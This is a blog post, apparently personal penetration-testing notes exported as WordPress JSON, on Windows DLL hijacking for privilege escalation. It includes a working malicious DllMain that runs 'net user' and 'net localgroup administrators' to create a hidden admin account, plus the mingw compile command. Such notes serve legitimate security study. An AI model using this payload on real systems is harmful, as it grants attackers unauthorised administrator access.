{"id":4123,"date":"2024-08-31T13:31:42","date_gmt":"2024-08-31T11:31:42","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=4123"},"modified":"2025-03-20T09:35:08","modified_gmt":"2025-03-20T08:35:08","slug":"dll-injection","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=4123","title":{"rendered":"<span class=\"caps\">DLL<\/span> injection + hijacking"},"content":{"rendered":"\n<ol class=\"wp-block-list\">\n<li>Down\u00adload a pro\u00adgram which runs with high\u00ader priv\u00adi\u00adlegs in an own&nbsp;<span class=\"caps\">VM<\/span>.<\/li>\n\n\n\n<li>Use Proc\u00admon to find DLLs which it tries to load, but did\u00adn\u2019t find. <a href=\"https:\/\/learn.microsoft.com\/de-de\/sysinternals\/downloads\/procmon#download\">Down\u00adload it from Microsoft.<\/a><\/li>\n\n\n\n<li>Fil\u00adter for the ser\u00advice or exe\u00adcute\u00adable. Restart it afterwards.<\/li>\n\n\n\n<li>See through the list and see if there are <span class=\"caps\">DLL<\/span> load\u00ading which are not there or which could be overwritten.&nbsp;<ul class=\"wp-block-list\">\n<li>Maybe fil\u00adter also for <code>Operation = CreateFile<\/code>.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>If you found a Place to cre\u00adate \/ over\u00adwrite an <span class=\"caps\">DLL<\/span>: Cre\u00adate a <span class=\"caps\">DLL<\/span>. <a href=\"https:\/\/learn.microsoft.com\/en-us\/troubleshoot\/windows-client\/setup-upgrade-and-drivers\/dynamic-link-library#the-dll-entry-point\">Using this tem\u00adplate from Microsoft<\/a>, a vari\u00adant could&nbsp;be:<\/li>\n<\/ol>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"cpp\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>#include &lt;stdlib.h&gt;\n#include &lt;windows.h&gt;\n\nBOOL APIENTRY DllMain(\nHANDLE hModule,\/\/ Handle to DLL module\nDWORD ul_reason_for_call,\/\/ Reason for calling function\nLPVOID lpReserved ) \/\/ Reserved\n{\n    switch ( ul_reason_for_call )\n    {\n        case DLL_PROCESS_ATTACH: \/\/ A process is loading the DLL.\n            int i;\n  \t    i = system (\"net user admin2 password123! \/add\");\n  \t    i = system (\"net localgroup administrators admin2 \/add\");\n        break;\n        case DLL_THREAD_ATTACH: \/\/ A process is creating a new thread.\n        break;\n        case DLL_THREAD_DETACH: \/\/ A thread exits normally.\n        break;\n        case DLL_PROCESS_DETACH: \/\/ A process unloads the DLL.\n        break;\n    }\n    return TRUE;\n}<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Com\u00adpile it native\u00adly or&nbsp;not:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Restart the ser\u00advice \/ appli\u00adca\u00adtion some\u00adhow and check if there is a new admin2 alive.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reflective <span class=\"caps\">DLL<\/span> Injection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">See <a href=\"https:\/\/github.com\/stephenfewer\/ReflectiveDLLInjection\">https:\/\/github.com\/stephenfewer\/ReflectiveDLLInjection<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Com\u00adpile it native\u00adly or&nbsp;not: x86_64-w64-ming\u00adw32-gcc searchedName.cpp \u2013shared \u2011o searchedName.dll Restart the ser\u00advice \/ appli\u00adca\u00adtion some\u00adhow and check if there is a new admin2 alive. Reflec\u00adtive <span class=\"caps\">DLL<\/span> Injec\u00adtion See https:\/\/github.com\/stephenfewer\/ReflectiveDLLInjection<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471],"tags":[408,501,502],"class_list":["post-4123","post","type-post","status-publish","format-standard","hentry","category-privesc","tag-dll","tag-dll-hijacking","tag-procmon"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4123"}],"version-history":[{"count":5,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4123\/revisions"}],"predecessor-version":[{"id":4740,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4123\/revisions\/4740"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4123"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4123"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}